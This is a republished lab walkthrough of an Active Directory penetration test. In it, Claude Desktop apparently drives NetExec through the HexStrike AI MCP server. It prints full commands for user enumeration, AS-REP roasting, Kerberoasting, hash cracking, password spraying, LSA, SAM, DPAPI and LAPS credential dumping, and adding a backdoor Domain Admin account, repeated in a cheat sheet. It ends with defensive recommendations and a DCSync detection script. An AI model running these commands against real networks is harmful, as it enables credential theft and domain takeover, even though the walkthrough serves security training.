AI‑Driven Active Directory Penetration Testing: A Complete Step‑by‑Step Walkthrough
This article demonstrates how to conduct a full Active Directory penetration test using HexStrike AI, Claude Desktop, and NetExec, where natural‑language prompts replace manual commands to enumerate users and groups, perform AS‑REP and Kerberoasting attacks, crack hashes, spray passwords, gain Domain Admin rights, extract credentials, establish persistence, and finally provide defensive recommendations based on the observed artifacts.
Overview
HexStrike AI exposes more than 150 offensive security tools via the Model Context Protocol (MCP). When Claude Desktop connects to the HexStrike AI MCP server, the AI acts as an operator: a natural‑language prompt selects the appropriate NetExec (nxc) module, fills in parameters, runs the command, and returns a structured result that can be copied directly into a penetration‑test report.
Lab Environment
Kali Linux workstation
Domain controllers DC1 (192.168.1.7) and DC2 (192.168.1.11) serving the ignite.local domain
Credentials used in the walk‑through
raaz / Password@1 – low‑privilege foothold
Administrator / Ignite@987 – obtained after password spraying
raj / Password@2 – reset during the attack, has LAPS read permission
All actions are performed with explicit permission in an isolated lab.
Installation and Server Startup
sudo apt install hexstrike-ai
The package pulls all required Python dependencies automatically.
hexstrike_mcp
The MCP server binds to 127.0.0.1:8888 and spawns a process pool for parallel tool execution. Keep this terminal open; stopping it disconnects Claude from all tools.
Claude Desktop Configuration
{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "hexstrike_mcp",
      "args": ["--server", "http://127.0.0.1:8888"],
      "description": "HexStrike AI Security Tools",
      "timeout": 300
    }
  }
}
Save the file as ~/.config/Claude/claude_desktop_config.json and restart Claude Desktop to verify the connection.
Phase 1 – Reconnaissance
Enumerate Domain Users
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --users
The command returns 23 accounts with annotations indicating AS‑REP‑roastable, Kerberoastable, and privileged‑group membership.
Enumerate Domain Groups
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --groups
Key findings:
Krishna – non‑default admin
Ram – member of Backup Operators and Remote Management Users
Sita – holds Key Admins
Sanjeet – member of gMSA group
AS‑REP Roasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --asreproast /tmp/asrep_ignite.txt --kdcHost 192.168.1.7
Account komal (UAC flag 0x400000, DONT_REQ_PREAUTH) is identified and its hash is saved to /tmp/asrep_ignite.txt.
Crack AS‑REP Hash
hashcat -m 18200 /tmp/asrep_ignite.txt /usr/share/wordlists/rockyou.txt
The password Password@1 is recovered in seconds, matching the low‑privilege credential and demonstrating credential‑reuse risk.
Kerberoasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --kerberoasting /tmp/kerb_ignite.txt --kdcHost 192.168.1.7
Accounts raj and kavish yield RC4 (etype 23) tickets, ready for hashcat mode 13100.
adminCount Objects
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --admin-count
Five objects (e.g., krishna, ram, sita) are flagged, indicating stale privileged entries.
Pre‑Windows 2000 Computer Accounts
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' -M pre2k --kdcHost 192.168.1.7
Account DEMO$ appears as a default‑password candidate.
Delegation Configuration
nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --find-delegation
Four misconfigurations are discovered:
Constrained delegation for kavish (MSSQL SPN)
Unconstrained delegation on WIN‑SQL$
Two resource‑based constrained delegations pointing to DC$
Anti‑Virus / EDR Enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' -M enum_av
Only Windows Defender is present; no third‑party EDR.
User Description Field
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' -M get-desc-users
Seven accounts contain descriptive notes that label each as a demonstration target (e.g., raj – Kerberoasting demo).
Domain Password Policy
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --pass-pol
The policy has no account‑lockout threshold and a minimum length of 7 characters, enabling safe password spraying.
Computer Enumeration & Shared Folders
nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --computers
Key hosts:
DC$ – RBCD target
WIN‑SQL$ – unconstrained delegation
MyGMSA$ – gMSA service account
MSEDGEWIN10$ – LAPS‑managed local admin
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --shares
Shares ADMIN$, IPC$ and SYSVOL are listed; C$ and D$ have write access.
Phase 2 – Exploitation
Zerologon (CVE‑2020‑1472) Check
nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M zerologon
No vulnerable Netlogon is found, indicating the patch is applied.
SMBGhost (CVE‑2020‑0796) Check
nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M smbghost
No vulnerability is reported.
NTLM Forced Authentication & Relay
nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M coerce_plus
DFSCoerce, PetitPotam, PrinterBug and MSEven all report vulnerable, providing a forced‑authentication path to DCSync.
Password Spraying
nxc smb 192.168.1.7 -u users.txt -p 'Ignite@987' --continue-on-success
The spray succeeds on ignite.local\Administrator, granting full domain control without triggering lockout.
Post‑Exploitation Credential Harvesting
Disk enumeration:
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --disks
Enable RDP:
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' -M rdp -o ACTION=enable
Interactive RDP:
xfreerdp /v:192.168.1.7 /u:Administrator /p:'Ignite@987' /cert:ignore
Reset user password (raj):
nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net user raj Password@2 /domain"
Export LSA Secrets:
nxc smb 192.168.1.11 -u Administrator -p 'Ignite@987' --lsa
Export SAM:
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --sam
Read LAPS password (using raj):
nxc ldap 192.168.1.7 -u raj -p 'Password@2' --laps
Dump WinSCP sessions:
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --winscp
DPAPI harvest:
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --dpapi
Persistence
nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net user nishant Password@2 /add /domain"
nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net group \"Domain Admins\" nishant /add /domain"
A new domain user nishant with password Password@2 is created and added to Domain Admins, providing a durable back‑door.
Phase 3 – Post‑Exploitation Evidence Collection
nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "wevtutil qe Security /c:15 /rd:true /f:text"
Recent Security event logs are exported. Event 4662 with GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS‑Replication‑Get‑Changes) is highlighted as the DCSync detection artifact.
Command Cheat Sheet (selected NetExec commands)
SMB Commands
# Share enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --shares
# User enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --users
# Group enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --groups
# Password policy
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --pass-pol
# Disk enumeration (admin)
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --disks
# Enable RDP
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' -M rdp -o ACTION=enable
# Export LSA Secrets
nxc smb 192.168.1.11 -u Administrator -p 'Ignite@987' --lsa
# Export SAM
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --sam
# DPAPI dump
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --dpapi
LDAP Commands
# BloodHound full collection
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --bloodhound --collection All --dns-server 192.168.1.7
# Kerberoasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --kerberoasting /tmp/kerb.txt --kdcHost 192.168.1.7
# AS‑REP Roasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --asreproast /tmp/asrep.txt --kdcHost 192.168.1.7
# Delegation discovery
nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --find-delegation
# adminCount objects
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --admin-count
# LAPS password read (using raj)
nxc ldap 192.168.1.7 -u raj -p 'Password@2' --laps
Defensive Recommendations
Set an account‑lockout threshold to break password‑spraying attacks.
Raise minimum password length to ≥14 characters and enforce complexity.
Remove the DONT_REQ_PREAUTH flag on all accounts to prevent AS‑REP Roasting.
Use long, random passwords for service accounts and enforce AES‑only encryption.
Regularly audit adminCount=1 objects and remove stale privileged entries.
Reset all Pre‑Windows 2000 computer accounts to non‑default passwords.
Never store secrets in the user description field; it is world‑readable.
Keep domain controllers patched (e.g., Zerologon, SMBGhost).
Mitigate NTLM forced‑authentication and relay attacks by enabling SMB signing, applying Extended Protection for Authentication (EPA), and restricting Print Spooler/DFS RPC interfaces.
Avoid saving credentials in applications like WinSCP; use key‑based authentication.
Do not browse the web or store personal credentials on domain controllers to reduce DPAPI exposure.
Restrict access to LSA/SAM/NTDS extraction tools and monitor their usage.
Lock down LAPS ACLs to only required roles and audit delegated password‑reset rights.
Deploy a tamper‑resistant EDR on DCs rather than relying solely on Windows Defender.
Alert on changes to fDenyTSConnections and on suspicious WinRM/WMI executions.
Generate high‑confidence alerts for Event 4720 (user creation) and 4728/4732 (privileged group addition).
Detect DCSync activity by flagging Event 4662 with the replication GUID when the source account is not a DC.
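The Event 4662 artifact collected in Phase 3 and the last recommendation above describe a single detection rule. As an added example (not code from the original article, HexStrike AI or NetExec), the Python below applies that rule to text exported with wevtutil /f:text; the record layout is simplified, the sample events are constructed, and the DC computer-account names are assumed for the lab.

```python
import re

# GUID of the DS-Replication-Get-Changes control access right, as cited on the page.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
# Computer accounts of the lab's two domain controllers (names assumed for this example).
DC_ACCOUNTS = {"DC1$", "DC2$"}
EVENT_SPLIT = re.compile(r"^Event\[\d+\]:", re.M)


def make_event(index, account, guids):
    """Build one 4662 record in the layout `wevtutil qe Security /f:text` prints.
    Constructed and simplified for this example; not a real capture."""
    props = "".join(f"\t{{{g}}}\n" for g in guids)
    return (f"Event[{index}]:\n  Log Name: Security\n  Event ID: 4662\n"
            f"  Computer: DC1.ignite.local\n  Description:\n"
            "An operation was performed on an object.\nSubject :\n"
            f"\tAccount Name:\t\t{account}\n\tAccount Domain:\t\tIGNITE\n"
            f"Operation:\n\tProperties:\t\tControl Access\n{props}")


# Constructed sample: DC2$ replicating (normal), Administrator replicating (DCSync),
# and raaz touching some other property (placeholder GUID, not the replication right).
SAMPLE_LOG = "".join([
    make_event(0, "DC2$", [REPL_GET_CHANGES]),
    make_event(1, "Administrator", [REPL_GET_CHANGES]),
    make_event(2, "raaz", ["00000000-0000-0000-0000-00000000abcd"]),
])


def dcsync_alerts(log_text, dc_accounts=DC_ACCOUNTS):
    """Return (account, logging DC) pairs for 4662 events that carry the
    replication GUID and whose subject is not a DC computer account."""
    alerts = []
    for record in EVENT_SPLIT.split(log_text):
        event_id = re.search(r"Event ID:\s*(\d+)", record)
        account = re.search(r"Account Name:\s*(\S+)", record)
        if not (event_id and account) or event_id.group(1) != "4662":
            continue
        name = account.group(1)
        if REPL_GET_CHANGES in record.lower() and name.upper() not in dc_accounts:
            computer = re.search(r"Computer:\s*(\S+)", record)
            alerts.append((name, computer.group(1) if computer else "unknown"))
    return alerts


if __name__ == "__main__":
    for name, dc in dcsync_alerts(SAMPLE_LOG):
        print(f"ALERT possible DCSync: {name} requested replication changes on {dc}")
```

Replication requests from DC accounts are suppressed because they are expected, so the filter only surfaces the Administrator event from the sample.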
Conclusion
The walk‑through demonstrates a complete Active Directory attack chain—from read‑only enumeration to Domain Admin takeover, credential exfiltration, persistence, and evidence collection—entirely driven by natural‑language prompts to HexStrike AI and executed by NetExec. By mirroring each offensive step with corresponding defensive detections, the article highlights both the power of AI‑assisted red teaming and the concrete controls defenders must implement to detect and mitigate such automated attacks.
This article has been distilled and summarized from source material and republished for learning and reference.
Black & White Path